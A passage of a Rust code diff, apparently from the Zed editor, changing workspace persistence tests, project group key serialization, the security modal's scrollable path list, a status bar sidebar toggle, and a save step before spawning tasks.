test_pending_removal_tasks_drained_on_flush(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use gpui::AppContext as _; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4288,15 +4385,22 @@ mod tests { }); let fs = fs::FakeFs::new(cx.executor()); + let dir = unique_test_dir(&fs, "pending-removal").await; let project1 = Project::test(fs.clone(), [], cx).await; let project2 = Project::test(fs.clone(), [], cx).await; + let db = cx.update(|cx| WorkspaceDb::global(cx)); + // Get a real DB id for workspace2 so the row actually exists. - let workspace2_db_id = DB.next_id().await.unwrap(); + let workspace2_db_id = db.next_id().await.unwrap(); let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project1.clone(), window, cx)); + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + multi_workspace.update_in(cx, |mw, _, cx| { mw.set_random_database_id(cx); }); @@ -4306,20 +4410,21 @@ mod tests { workspace.update(cx, |ws: &mut crate::Workspace, _cx| { ws.set_database_id(workspace2_db_id) }); - mw.activate(workspace.clone(), cx); + mw.activate(workspace.clone(), window, cx); }); // Save a full workspace row to the DB directly and let it settle. - DB.save_workspace(SerializedWorkspace { + let session_id = format!("pending-removal-session-{}", Uuid::new_v4()); + db.save_workspace(SerializedWorkspace { id: workspace2_db_id, - paths: PathList::new(&["/tmp/pending_removal_test"]), + paths: PathList::new(&[&dir]), location: SerializedWorkspaceLocation::Local, center_group: Default::default(), window_bounds: Default::default(), display: Default::default(), docks: Default::default(), centered_layout: false, - session_id: Some("pending-removal-session".to_owned()), + session_id: Some(session_id.clone()), breakpoints: Default::default(), window_id: Some(88), user_toolchains: Default::default(), @@ -4329,7 +4434,8 @@ mod tests { // Remove workspace2 — this pushes a task to pending_removal_tasks. multi_workspace.update_in(cx, |mw, window, cx| { - mw.remove_workspace(1, window, cx); + let ws = mw.workspaces().nth(1).unwrap().clone(); + mw.remove(&ws, window, cx); }); // Simulate the quit handler pattern: collect flush tasks + pending @@ -4337,7 +4443,6 @@ mod tests { let all_tasks = multi_workspace.update_in(cx, |mw, window, cx| { let mut tasks: Vec> = mw .workspaces() - .iter() .map(|workspace| { workspace.update(cx, |workspace, cx| { workspace.flush_serialization(window, cx) @@ -4353,19 +4458,29 @@ mod tests { }); futures::future::join_all(all_tasks).await; - // After awaiting, the DB row should be deleted. + // The row should still exist (for recent projects), but the session + // binding should have been cleared by the pending removal task. assert!( - DB.workspace_for_id(workspace2_db_id).is_none(), - "Pending removal task should have deleted the workspace row when awaited" + db.workspace_for_id(workspace2_db_id).is_some(), + "Workspace row should be preserved for recent projects" + ); + + let session_workspaces = db + .last_session_workspace_locations("pending-removal-session", None, fs.as_ref()) + .await + .unwrap(); + let restored_ids: Vec = session_workspaces + .iter() + .map(|sw| sw.workspace_id) + .collect(); + assert!( + !restored_ids.contains(&workspace2_db_id), + "Pending removal task should have cleared the session binding" ); } #[gpui::test] async fn test_create_workspace_bounds_observer_uses_fresh_id(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4383,11 +4498,9 @@ mod tests { mw.set_random_database_id(cx); }); - multi_workspace.update_in(cx, |mw, window, cx| { - mw.create_workspace(window, cx); - }); - - cx.run_until_parked(); + let task = + multi_workspace.update_in(cx, |mw, window, cx| mw.create_test_workspace(window, cx)); + task.await; let new_workspace_db_id = multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).database_id()); @@ -4398,8 +4511,10 @@ mod tests { let workspace_id = new_workspace_db_id.unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + assert!( - DB.workspace_for_id(workspace_id).is_some(), + db.workspace_for_id(workspace_id).is_some(), "The workspace row should exist in the DB" ); @@ -4410,7 +4525,7 @@ mod tests { cx.executor().advance_clock(Duration::from_millis(200)); cx.run_until_parked(); - let serialized = DB + let serialized = db .workspace_for_id(workspace_id) .expect("workspace row should still exist"); assert!( @@ -4423,10 +4538,6 @@ mod tests { #[gpui::test] async fn test_flush_serialization_writes_bounds(cx: &mut gpui::TestAppContext) { - use crate::multi_workspace::MultiWorkspace; - use feature_flags::FeatureFlagAppExt; - use project::Project; - crate::tests::init_test(cx); cx.update(|cx| { @@ -4443,7 +4554,8 @@ mod tests { let (multi_workspace, cx) = cx.add_window_view(|window, cx| MultiWorkspace::test_new(project.clone(), window, cx)); - let workspace_id = DB.next_id().await.unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + let workspace_id = db.next_id().await.unwrap(); multi_workspace.update_in(cx, |mw, _, cx| { mw.workspace().update(cx, |ws, _cx| { ws.set_database_id(workspace_id); @@ -4456,7 +4568,7 @@ mod tests { }); task.await; - let after = DB + let after = db .workspace_for_id(workspace_id) .expect("workspace row should exist after flush_serialization"); assert!( @@ -4469,4 +4581,335 @@ mod tests { before the process exits." ); } + + #[gpui::test] + async fn test_resolve_worktree_workspaces(cx: &mut gpui::TestAppContext) { + let fs = fs::FakeFs::new(cx.executor()); + + // Main repo with a linked worktree entry + fs.insert_tree( + "/repo", + json!({ + ".git": { + "worktrees": { + "feature": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + // Linked worktree checkout pointing back to /repo + fs.insert_tree( + "/worktree", + json!({ + ".git": "gitdir: /repo/.git/worktrees/feature", + "src": { "main.rs": "" } + }), + ) + .await; + + // A plain non-git project + fs.insert_tree( + "/plain-project", + json!({ + "src": { "main.rs": "" } + }), + ) + .await; + + // Another normal git repo (used in mixed-path entry) + fs.insert_tree( + "/other-repo", + json!({ + ".git": {}, + "src": { "lib.rs": "" } + }), + ) + .await; + + let t0 = Utc::now() - chrono::Duration::hours(4); + let t1 = Utc::now() - chrono::Duration::hours(3); + let t2 = Utc::now() - chrono::Duration::hours(2); + let t3 = Utc::now() - chrono::Duration::hours(1); + + let workspaces = vec![ + // 1: Main checkout of /repo (opened earlier) + ( + WorkspaceId(1), + SerializedWorkspaceLocation::Local, + PathList::new(&["/repo"]), + t0, + ), + // 2: Linked worktree of /repo (opened more recently) + // Should dedup with #1; more recent timestamp wins. + ( + WorkspaceId(2), + SerializedWorkspaceLocation::Local, + PathList::new(&["/worktree"]), + t1, + ), + // 3: Mixed-path workspace: one root is a linked worktree, + // the other is a normal repo. The worktree path should be + // resolved; the normal path kept as-is. + ( + WorkspaceId(3), + SerializedWorkspaceLocation::Local, + PathList::new(&["/other-repo", "/worktree"]), + t2, + ), + // 4: Non-git project — passed through unchanged. + ( + WorkspaceId(4), + SerializedWorkspaceLocation::Local, + PathList::new(&["/plain-project"]), + t3, + ), + ]; + + let result = resolve_worktree_workspaces(workspaces, fs.as_ref()).await; + + // Should have 3 entries: #1 and #2 deduped into one, plus #3 and #4. + assert_eq!(result.len(), 3); + + // First entry: /repo — deduplicated from #1 and #2. + // Keeps the position of #1 (first seen), but with #2's later timestamp. + assert_eq!(result[0].2.paths(), &[PathBuf::from("/repo")]); + assert_eq!(result[0].3, t1); + + // Second entry: mixed-path workspace with worktree resolved. + // /worktree → /repo, so paths become [/other-repo, /repo] (sorted). + assert_eq!( + result[1].2.paths(), + &[PathBuf::from("/other-repo"), PathBuf::from("/repo")] + ); + assert_eq!(result[1].0, WorkspaceId(3)); + + // Third entry: non-git project, unchanged. + assert_eq!(result[2].2.paths(), &[PathBuf::from("/plain-project")]); + assert_eq!(result[2].0, WorkspaceId(4)); + } + + #[gpui::test] + async fn test_restore_window_with_linked_worktree_and_multiple_project_groups( + cx: &mut gpui::TestAppContext, + ) { + crate::tests::init_test(cx); + + cx.update(|cx| { + cx.set_staff(true); + cx.update_flags(true, vec!["agent-v2".to_string()]); + }); + + let fs = fs::FakeFs::new(cx.executor()); + + // Main git repo at /repo + fs.insert_tree( + "/repo", + json!({ + ".git": { + "HEAD": "ref: refs/heads/main", + "worktrees": { + "feature": { + "commondir": "../../", + "HEAD": "ref: refs/heads/feature" + } + } + }, + "src": { "main.rs": "" } + }), + ) + .await; + + // Linked worktree checkout pointing back to /repo + fs.insert_tree( + "/worktree-feature", + json!({ + ".git": "gitdir: /repo/.git/worktrees/feature", + "src": { "lib.rs": "" } + }), + ) + .await; + + // --- Phase 1: Set up the original multi-workspace window --- + + let project_1 = Project::test(fs.clone(), ["/repo".as_ref()], cx).await; + let project_1_linked_worktree = + Project::test(fs.clone(), ["/worktree-feature".as_ref()], cx).await; + + // Wait for git discovery to finish. + cx.run_until_parked(); + + // Create a second, unrelated project so we have two distinct project groups. + fs.insert_tree( + "/other-project", + json!({ + ".git": { "HEAD": "ref: refs/heads/main" }, + "readme.md": "" + }), + ) + .await; + let project_2 = Project::test(fs.clone(), ["/other-project".as_ref()], cx).await; + cx.run_until_parked(); + + // Create the MultiWorkspace with project_2, then add the main repo + // and its linked worktree. The linked worktree is added last and + // becomes the active workspace. + let (multi_workspace, cx) = cx + .add_window_view(|window, cx| MultiWorkspace::test_new(project_2.clone(), window, cx)); + + multi_workspace.update(cx, |mw, cx| { + mw.open_sidebar(cx); + }); + + multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_1.clone(), window, cx); + }); + + let workspace_worktree = multi_workspace.update_in(cx, |mw, window, cx| { + mw.test_add_workspace(project_1_linked_worktree.clone(), window, cx) + }); + + // Assign database IDs and set up session bindings so serialization + // writes real rows. + multi_workspace.update_in(cx, |mw, _, cx| { + for workspace in mw.workspaces() { + workspace.update(cx, |ws, _cx| { + ws.set_random_database_id(); + }); + } + }); + + // Flush serialization for each individual workspace (writes to SQLite) + // and for the MultiWorkspace (writes to KVP). + let tasks = multi_workspace.update_in(cx, |mw, window, cx| { + let session_id = mw.workspace().read(cx).session_id(); + let window_id_u64 = window.window_handle().window_id().as_u64(); + + let mut tasks: Vec> = Vec::new(); + for workspace in mw.workspaces() { + tasks.push(workspace.update(cx, |ws, cx| ws.flush_serialization(window, cx))); + if let Some(db_id) = workspace.read(cx).database_id() { + let db = WorkspaceDb::global(cx); + let session_id = session_id.clone(); + tasks.push(cx.background_spawn(async move { + db.set_session_binding(db_id, session_id, Some(window_id_u64)) + .await + .log_err(); + })); + } + } + mw.serialize(cx); + tasks + }); + cx.run_until_parked(); + for task in tasks { + task.await; + } + cx.run_until_parked(); + + let active_db_id = workspace_worktree.read_with(cx, |ws, _| ws.database_id()); + assert!( + active_db_id.is_some(), + "Active workspace should have a database ID" + ); + + // --- Phase 2: Read back and verify the serialized state --- + + let session_id = multi_workspace + .read_with(cx, |mw, cx| mw.workspace().read(cx).session_id()) + .unwrap(); + let db = cx.update(|_, cx| WorkspaceDb::global(cx)); + let session_workspaces = db + .last_session_workspace_locations(&session_id, None, fs.as_ref()) + .await + .expect("should load session workspaces"); + assert!( + !session_workspaces.is_empty(), + "Should have at least one session workspace" + ); + + let multi_workspaces = + cx.update(|_, cx| read_serialized_multi_workspaces(session_workspaces, cx)); + assert_eq!( + multi_workspaces.len(), + 1, + "All workspaces share one window, so there should be exactly one multi-workspace" + ); + + let serialized = &multi_workspaces[0]; + assert_eq!( + serialized.active_workspace.workspace_id, + active_db_id.unwrap(), + ); + assert_eq!(serialized.state.project_group_keys.len(), 2,); + + // Verify the serialized project group keys round-trip back to the + // originals. + let restored_keys: Vec = serialized + .state + .project_group_keys + .iter() + .cloned() + .map(Into::into) + .collect(); + let expected_keys = vec![ + ProjectGroupKey::new(None, PathList::new(&["/other-project"])), + ProjectGroupKey::new(None, PathList::new(&["/repo"])), + ]; + assert_eq!( + restored_keys, expected_keys, + "Deserialized project group keys should match the originals" + ); + + // --- Phase 3: Restore the window and verify the result --- + + let app_state = + multi_workspace.read_with(cx, |mw, cx| mw.workspace().read(cx).app_state().clone()); + + let serialized_mw = multi_workspaces.into_iter().next().unwrap(); + let restored_handle: gpui::WindowHandle = cx + .update(|_, cx| { + cx.spawn(async move |mut cx| { + crate::restore_multiworkspace(serialized_mw, app_state, &mut cx).await + }) + }) + .await + .expect("restore_multiworkspace should succeed"); + + cx.run_until_parked(); + + // The restored window should have the same project group keys. + let restored_keys: Vec = restored_handle + .read_with(cx, |mw: &MultiWorkspace, _cx| { + mw.project_group_keys().cloned().collect() + }) + .unwrap(); + assert_eq!( + restored_keys, expected_keys, + "Restored window should have the same project group keys as the original" + ); + + // The active workspace in the restored window should have the linked + // worktree paths. + let active_paths: Vec = restored_handle + .read_with(cx, |mw: &MultiWorkspace, cx| { + mw.workspace() + .read(cx) + .root_paths(cx) + .into_iter() + .map(|p: Arc| p.to_path_buf()) + .collect() + }) + .unwrap(); + assert_eq!( + active_paths, + vec![PathBuf::from("/worktree-feature")], + "The restored active workspace should be the linked worktree project" + ); + } } diff --git a/crates/workspace/src/persistence/model.rs b/crates/workspace/src/persistence/model.rs index cdb646ec3b8248bdd0b5784424ed7b8df8ac0ee8..b50d82fff0b05c3511967dd65a9060e38ca4ca26 100644 --- a/crates/workspace/src/persistence/model.rs +++ b/crates/workspace/src/persistence/model.rs @@ -13,7 +13,7 @@ use db::sqlez::{ use gpui::{AsyncWindowContext, Entity, WeakEntity, WindowId}; use language::{Toolchain, ToolchainScope}; -use project::{Project, debugger::breakpoint_store::SourceBreakpoint}; +use project::{Project, ProjectGroupKey, debugger::breakpoint_store::SourceBreakpoint}; use remote::RemoteConnectionOptions; use serde::{Deserialize, Serialize}; use std::{ @@ -21,7 +21,7 @@ use std::{ path::{Path, PathBuf}, sync::Arc, }; -use util::ResultExt; +use util::{ResultExt, path_list::SerializedPathList}; use uuid::Uuid; #[derive( @@ -36,7 +36,7 @@ pub(crate) enum RemoteConnectionKind { Docker, } -#[derive(Debug, PartialEq, Clone)] +#[derive(Debug, PartialEq, Clone, serde::Serialize, serde::Deserialize)] pub enum SerializedWorkspaceLocation { Local, Remote(RemoteConnectionOptions), @@ -59,19 +59,51 @@ pub struct SessionWorkspace { pub window_id: Option, } +#[derive(Debug, Clone, serde::Serialize, serde::Deserialize)] +pub struct SerializedProjectGroupKey { + pub path_list: SerializedPathList, + pub(crate) location: SerializedWorkspaceLocation, +} + +impl From for SerializedProjectGroupKey { + fn from(value: ProjectGroupKey) -> Self { + SerializedProjectGroupKey { + path_list: value.path_list().serialize(), + location: match value.host() { + Some(host) => SerializedWorkspaceLocation::Remote(host), + None => SerializedWorkspaceLocation::Local, + }, + } + } +} + +impl From for ProjectGroupKey { + fn from(value: SerializedProjectGroupKey) -> Self { + let path_list = PathList::deserialize(&value.path_list); + let host = match value.location { + SerializedWorkspaceLocation::Local => None, + SerializedWorkspaceLocation::Remote(opts) => Some(opts), + }; + ProjectGroupKey::new(host, path_list) + } +} + /// Per-window state for a MultiWorkspace, persisted to KVP. #[derive(Debug, Clone, Default, serde::Serialize, serde::Deserialize)] pub struct MultiWorkspaceState { pub active_workspace_id: Option, pub sidebar_open: bool, + pub project_group_keys: Vec, + #[serde(default)] + pub sidebar_state: Option, } /// The serialized state of a single MultiWorkspace window from a previous session: -/// all workspaces that shared the window, which one was active, and whether the -/// sidebar was open. +/// the active workspace to restore plus window-level state (project group keys, +/// sidebar). #[derive(Debug, Clone)] pub struct SerializedMultiWorkspace { - pub workspaces: Vec, + pub active_workspace: SessionWorkspace, pub state: MultiWorkspaceState, } @@ -93,9 +125,9 @@ pub(crate) struct SerializedWorkspace { #[derive(Debug, PartialEq, Clone, Default, Serialize, Deserialize)] pub struct DockStructure { - pub(crate) left: DockData, - pub(crate) right: DockData, - pub(crate) bottom: DockData, + pub left: DockData, + pub right: DockData, + pub bottom: DockData, } impl RemoteConnectionKind { @@ -143,9 +175,9 @@ impl Bind for DockStructure { #[derive(Debug, PartialEq, Clone, Default, Serialize, Deserialize)] pub struct DockData { - pub(crate) visible: bool, - pub(crate) active_panel: Option, - pub(crate) zoom: bool, + pub visible: bool, + pub active_panel: Option, + pub zoom: bool, } impl Column for DockData { diff --git a/crates/workspace/src/searchable.rs b/crates/workspace/src/searchable.rs index 93d809d7a522d11e4b4bd78e71899b89aa4d0508..f0932a7d7b3e7880c27b40c28890f063f4de731e 100644 --- a/crates/workspace/src/searchable.rs +++ b/crates/workspace/src/searchable.rs @@ -55,6 +55,7 @@ pub struct SearchOptions { /// Specifies whether the supports search & replace. pub replacement: bool, pub selection: bool, + pub select_all: bool, pub find_in_results: bool, } @@ -78,6 +79,7 @@ pub trait SearchableItem: Item + EventEmitter { regex: true, replacement: true, selection: true, + select_all: true, find_in_results: false, } } diff --git a/crates/workspace/src/security_modal.rs b/crates/workspace/src/security_modal.rs index 664aa891550cecdd602d54bfca579d04e03f33dc..2130a1d1eca3d33651a057d32a252718270f89f8 100644 --- a/crates/workspace/src/security_modal.rs +++ b/crates/workspace/src/security_modal.rs @@ -7,7 +7,7 @@ use std::{ }; use collections::{HashMap, HashSet}; -use gpui::{DismissEvent, EventEmitter, FocusHandle, Focusable, WeakEntity}; +use gpui::{DismissEvent, EventEmitter, FocusHandle, Focusable, ScrollHandle, WeakEntity}; use project::{ WorktreeId, @@ -17,7 +17,8 @@ use project::{ use smallvec::SmallVec; use theme::ActiveTheme; use ui::{ - AlertModal, Checkbox, FluentBuilder, KeyBinding, ListBulletItem, ToggleState, prelude::*, + AlertModal, Checkbox, FluentBuilder, KeyBinding, ListBulletItem, ToggleState, WithScrollbar, + prelude::*, }; use crate::{DismissDecision, ModalView, ToggleWorktreeSecurity}; @@ -29,6 +30,7 @@ pub struct SecurityModal { worktree_store: WeakEntity, remote_host: Option, focus_handle: FocusHandle, + project_list_scroll_handle: ScrollHandle, trusted: Option, } @@ -63,16 +65,17 @@ impl ModalView for SecurityModal { } impl Render for SecurityModal { - fn render(&mut self, _window: &mut Window, cx: &mut Context) -> impl IntoElement { + fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { if self.restricted_paths.is_empty() { self.dismiss(cx); return v_flex().into_any_element(); } - let header_label = if self.restricted_paths.len() == 1 { - "Unrecognized Project" + let restricted_count = self.restricted_paths.len(); + let header_label: SharedString = if restricted_count == 1 { + "Unrecognized Project".into() } else { - "Unrecognized Projects" + format!("Unrecognized Projects ({})", restricted_count).into() }; let trust_label = self.build_trust_label(); @@ -102,32 +105,61 @@ impl Render for SecurityModal { .child(Icon::new(IconName::Warning).color(Color::Warning)) .child(Label::new(header_label)), ) - .children(self.restricted_paths.values().filter_map(|restricted_path| { - let abs_path = if restricted_path.is_file { - restricted_path.abs_path.parent() - } else { - Some(restricted_path.abs_path.as_ref()) - }?; - let label = match &restricted_path.host { - Some(remote_host) => match &remote_host.user_name { - Some(user_name) => format!( - "{} ({}@{})", - self.shorten_path(abs_path).display(), - user_name, - remote_host.host_identifier - ), - None => format!( - "{} ({})", - self.shorten_path(abs_path).display(), - remote_host.host_identifier - ), - }, - None => self.shorten_path(abs_path).display().to_string(), - }; - Some(h_flex() - .pl(IconSize::default().rems() + rems(0.5)) - .child(Label::new(label).color(Color::Muted))) - })), + .child( + div() + .size_full() + .vertical_scrollbar_for(&self.project_list_scroll_handle, window, cx) + .child( + v_flex() + .id("paths_container") + .max_h_24() + .overflow_y_scroll() + .track_scroll(&self.project_list_scroll_handle) + .children( + self.restricted_paths.values().filter_map( + |restricted_path| { + let abs_path = if restricted_path.is_file { + restricted_path.abs_path.parent() + } else { + Some(restricted_path.abs_path.as_ref()) + }?; + let label = match &restricted_path.host { + Some(remote_host) => { + match &remote_host.user_name { + Some(user_name) => format!( + "{} ({}@{})", + self.shorten_path(abs_path) + .display(), + user_name, + remote_host.host_identifier + ), + None => format!( + "{} ({})", + self.shorten_path(abs_path) + .display(), + remote_host.host_identifier + ), + } + } + None => self + .shorten_path(abs_path) + .display() + .to_string(), + }; + Some( + h_flex() + .pl( + IconSize::default().rems() + rems(0.5), + ) + .child( + Label::new(label).color(Color::Muted), + ), + ) + }, + ), + ), + ), + ), ) .child( v_flex() @@ -219,6 +251,7 @@ impl SecurityModal { remote_host: remote_host.map(|host| host.into()), restricted_paths: HashMap::default(), focus_handle: cx.focus_handle(), + project_list_scroll_handle: ScrollHandle::new(), trust_parents: false, home_dir: std::env::home_dir(), trusted: None, diff --git a/crates/workspace/src/shared_screen.rs b/crates/workspace/src/shared_screen.rs index 136f552fee23231b45fcb867d2ce8bab02dca7e8..41e8f41f2ad4e10b85ceb68e5f4690b1faf6c04a 100644 --- a/crates/workspace/src/shared_screen.rs +++ b/crates/workspace/src/shared_screen.rs @@ -69,7 +69,7 @@ impl Item for SharedScreen { fn deactivated(&mut self, _window: &mut Window, cx: &mut Context) { if let Some(nav_history) = self.nav_history.as_mut() { - nav_history.push::<()>(None, cx); + nav_history.push::<()>(None, None, cx); } } diff --git a/crates/workspace/src/status_bar.rs b/crates/workspace/src/status_bar.rs index 5e0b8a7f6eabbd652f1f429342a837aa0b43e6d2..dad5389f2f5574c773af740fd61c6c1501c2fea0 100644 --- a/crates/workspace/src/status_bar.rs +++ b/crates/workspace/src/status_bar.rs @@ -1,11 +1,14 @@ -use crate::{ItemHandle, Pane}; +use crate::{ + ItemHandle, MultiWorkspace, Pane, SidebarSide, ToggleWorkspaceSidebar, + sidebar_side_context_menu, +}; use gpui::{ - AnyView, App, Context, Decorations, Entity, IntoElement, ParentElement, Render, Styled, - Subscription, Window, + AnyView, App, Context, Corner, Decorations, Entity, IntoElement, ParentElement, Render, Styled, + Subscription, WeakEntity, Window, }; use std::any::TypeId; use theme::CLIENT_SIDE_DECORATION_ROUNDING; -use ui::{h_flex, prelude::*}; +use ui::{Divider, Indicator, Tooltip, prelude::*}; use util::ResultExt; pub trait StatusItemView: Render { @@ -29,31 +32,62 @@ trait StatusItemViewHandle: Send { fn item_type(&self) -> TypeId; } +#[derive(Default)] +struct SidebarStatus { + open: bool, + side: SidebarSide, + has_notifications: bool, + show_toggle: bool, +} + +impl SidebarStatus { + fn query(multi_workspace: &Option>, cx: &App) -> Self { + multi_workspace + .as_ref() + .and_then(|mw| mw.upgrade()) + .map(|mw| { + let mw = mw.read(cx); + let enabled = mw.multi_workspace_enabled(cx); + Self { + open: mw.sidebar_open() && enabled, + side: mw.sidebar_side(cx), + has_notifications: mw.sidebar_has_notifications(cx), + show_toggle: enabled, + } + }) + .unwrap_or_default() + } +} + pub struct StatusBar { left_items: Vec>, right_items: Vec>, active_pane: Entity, + multi_workspace: Option>, _observe_active_pane: Subscription, - workspace_sidebar_open: bool, } impl Render for StatusBar { fn render(&mut self, window: &mut Window, cx: &mut Context) -> impl IntoElement { + let sidebar = SidebarStatus::query(&self.multi_workspace, cx); + h_flex() .w_full() .justify_between() .gap(DynamicSpacing::Base08.rems(cx)) - .py(DynamicSpacing::Base04.rems(cx)) - .px(DynamicSpacing::Base06.rems(cx)) + .p(DynamicSpacing::Base04.rems(cx)) .bg(cx.theme().colors().status_bar_background) .map(|el| match window.window_decorations() { Decorations::Server => el, Decorations::Client { tiling, .. } => el - .when(!(tiling.bottom || tiling.right), |el| { - el.rounded_br(CLIENT_SIDE_DECORATION_ROUNDING) - }) .when( - !(tiling.bottom || tiling.left) && !self.workspace_sidebar_open, + !(tiling.bottom || tiling.right) + && !(sidebar.open && sidebar.side == SidebarSide::Right), + |el| el.rounded_br(CLIENT_SIDE_DECORATION_ROUNDING), + ) + .when( + !(tiling.bottom || tiling.left) + && !(sidebar.open && sidebar.side == SidebarSide::Left), |el| el.rounded_bl(CLIENT_SIDE_DECORATION_ROUNDING), ) // This border is to avoid a transparent gap in the rounded corners @@ -61,44 +95,128 @@ impl Render for StatusBar { .border_b(px(1.0)) .border_color(cx.theme().colors().status_bar_background), }) - .child(self.render_left_tools()) - .child(self.render_right_tools()) + .child(self.render_left_tools(&sidebar, cx)) + .child(self.render_right_tools(&sidebar, cx)) } } impl StatusBar { - fn render_left_tools(&self) -> impl IntoElement { + fn render_left_tools( + &self, + sidebar: &SidebarStatus, + cx: &mut Context, + ) -> impl IntoElement { h_flex() .gap_1() + .min_w_0() .overflow_x_hidden() + .when( + sidebar.show_toggle && !sidebar.open && sidebar.side == SidebarSide::Left, + |this| this.child(self.render_sidebar_toggle(sidebar, cx)), + ) .children(self.left_items.iter().map(|item| item.to_any())) } - fn render_right_tools(&self) -> impl IntoElement { + fn render_right_tools( + &self, + sidebar: &SidebarStatus, + cx: &mut Context, + ) -> impl IntoElement { h_flex() + .flex_shrink_0() .gap_1() .overflow_x_hidden() .children(self.right_items.iter().rev().map(|item| item.to_any())) + .when( + sidebar.show_toggle && !sidebar.open && sidebar.side == SidebarSide::Right, + |this| this.child(self.render_sidebar_toggle(sidebar, cx)), + ) + } + + fn render_sidebar_toggle( + &self, + sidebar: &SidebarStatus, + cx: &mut Context, + ) -> impl IntoElement { + let on_right = sidebar.side == SidebarSide::Right; + let has_notifications = sidebar.has_notifications; + let indicator_border = cx.theme().colors().status_bar_background; + + let toggle = sidebar_side_context_menu("sidebar-status-toggle-menu", cx) + .anchor(if on_right { + Corner::BottomRight + } else { + Corner::BottomLeft + }) + .attach(if on_right { + Corner::TopRight + } else { + Corner::TopLeft + }) + .trigger(move |_is_active, _window, _cx| { + IconButton::new( + "toggle-workspace-sidebar", + if on_right { + IconName::ThreadsSidebarRightClosed + } else { + IconName::ThreadsSidebarLeftClosed + }, + ) + .icon_size(IconSize::Small) + .when(has_notifications, |this| { + this.indicator(Indicator::dot().color(Color::Accent)) + .indicator_border_color(Some(indicator_border)) + }) + .tooltip(move |_, cx| { + Tooltip::for_action("Open Threads Sidebar", &ToggleWorkspaceSidebar, cx) + }) + .on_click(move |_, window, cx| { + if let Some(multi_workspace) = window.root::().flatten() { + multi_workspace.update(cx, |multi_workspace, cx| { + multi_workspace.toggle_sidebar(window, cx); + }); + } + }) + }); + + h_flex() + .gap_0p5() + .when(on_right, |this| { + this.child(Divider::vertical().color(ui::DividerColor::Border)) + }) + .child(toggle) + .when(!on_right, |this| { + this.child(Divider::vertical().color(ui::DividerColor::Border)) + }) } } impl StatusBar { - pub fn new(active_pane: &Entity, window: &mut Window, cx: &mut Context) -> Self { + pub fn new( + active_pane: &Entity, + multi_workspace: Option>, + window: &mut Window, + cx: &mut Context, + ) -> Self { let mut this = Self { left_items: Default::default(), right_items: Default::default(), active_pane: active_pane.clone(), + multi_workspace, _observe_active_pane: cx.observe_in(active_pane, window, |this, _, window, cx| { this.update_active_pane_item(window, cx) }), - workspace_sidebar_open: false, }; this.update_active_pane_item(window, cx); this } - pub fn set_workspace_sidebar_open(&mut self, open: bool, cx: &mut Context) { - self.workspace_sidebar_open = open; + pub fn set_multi_workspace( + &mut self, + multi_workspace: WeakEntity, + cx: &mut Context, + ) { + self.multi_workspace = Some(multi_workspace); cx.notify(); } diff --git a/crates/workspace/src/tasks.rs b/crates/workspace/src/tasks.rs index f85e1488f97491a73314297d91c597bd7d3bb841..98421365532a8fdd4fc36f0f5c68e83b0814ae8e 100644 --- a/crates/workspace/src/tasks.rs +++ b/crates/workspace/src/tasks.rs @@ -1,16 +1,19 @@ use std::process::ExitStatus; use anyhow::Result; +use collections::HashSet; use gpui::{AppContext, Context, Entity, Task}; use language::Buffer; use project::{TaskSourceKind, WorktreeId}; use remote::ConnectionState; use task::{ - DebugScenario, ResolvedTask, SharedTaskContext, SpawnInTerminal, TaskContext, TaskTemplate, + DebugScenario, ResolvedTask, SaveStrategy, SharedTaskContext, SpawnInTerminal, TaskContext, + TaskHook, TaskTemplate, TaskVariables, VariableName, }; use ui::Window; +use util::TryFutureExt; -use crate::{Toast, Workspace, notifications::NotificationId}; +use crate::{SaveIntent, Toast, Workspace, notifications::NotificationId}; impl Workspace { pub fn schedule_task( @@ -73,28 +76,57 @@ impl Workspace { }); } - if let Some(terminal_provider) = self.terminal_provider.as_ref() { - let task_status = terminal_provider.spawn(spawn_in_terminal, window, cx); - - let task = cx.spawn(async |w, cx| { - let res = cx.background_spawn(task_status).await; - match res { - Some(Ok(status)) => { - if status.success() { - log::debug!("Task spawn succeeded"); - } else { - log::debug!("Task spawn failed, code: {:?}", status.code()); - } + if self.terminal_provider.is_some() { + let task = cx.spawn_in(window, async move |workspace, cx| { + let save_action = match spawn_in_terminal.save { + SaveStrategy::All => { + let save_all = workspace.update_in(cx, |workspace, window, cx| { + let task = workspace.save_all_internal(SaveIntent::SaveAll, window, cx); + // Match the type of the other arm by ignoring the bool value returned + cx.background_spawn(async { task.await.map(|_| ()) }) + }); + save_all.ok() } - Some(Err(e)) => { - log::error!("Task spawn failed: {e:#}"); - _ = w.update(cx, |w, cx| { - let id = NotificationId::unique::(); - w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx); - }) + SaveStrategy::Current => { + let save_current = workspace.update_in(cx, |workspace, window, cx| { + workspace.save_active_item(SaveIntent::SaveAll, window, cx) + }); + save_current.ok() } - None => log::debug!("Task spawn got cancelled"), + SaveStrategy::None => None, }; + if let Some(save_action) = save_action { + save_action.log_err().await; + } + + let spawn_task = workspace.update_in(cx, |workspace, window, cx| { + workspace + .terminal_provider + .as_ref() + .map(|terminal_provider| { + terminal_provider.spawn(spawn_in_terminal, window, cx) + }) + }); + if let Some(spawn_task) = spawn_task.ok().flatten() { + let res = cx.background_spawn(spawn_task).await; + match res { + Some(Ok(status)) => { + if status.success() { + log::debug!("Task spawn succeeded"); + } else { + log::debug!("Task spawn failed, code: {:?}", status.code()); + } + } + Some(Err(e)) => { + log::error!("Task spawn failed: {e:#}"); + _ = workspace.update(cx, |w, cx| { + let id = NotificationId::unique::(); + w.show_toast(Toast::new(id, format!("Task spawn failed: {e}")), cx); + }) + } + None => log::debug!("Task spawn got cancelled"), + }; + } }); self.scheduled_tasks.push(task); } @@ -133,4 +165,272 @@ impl Workspace { 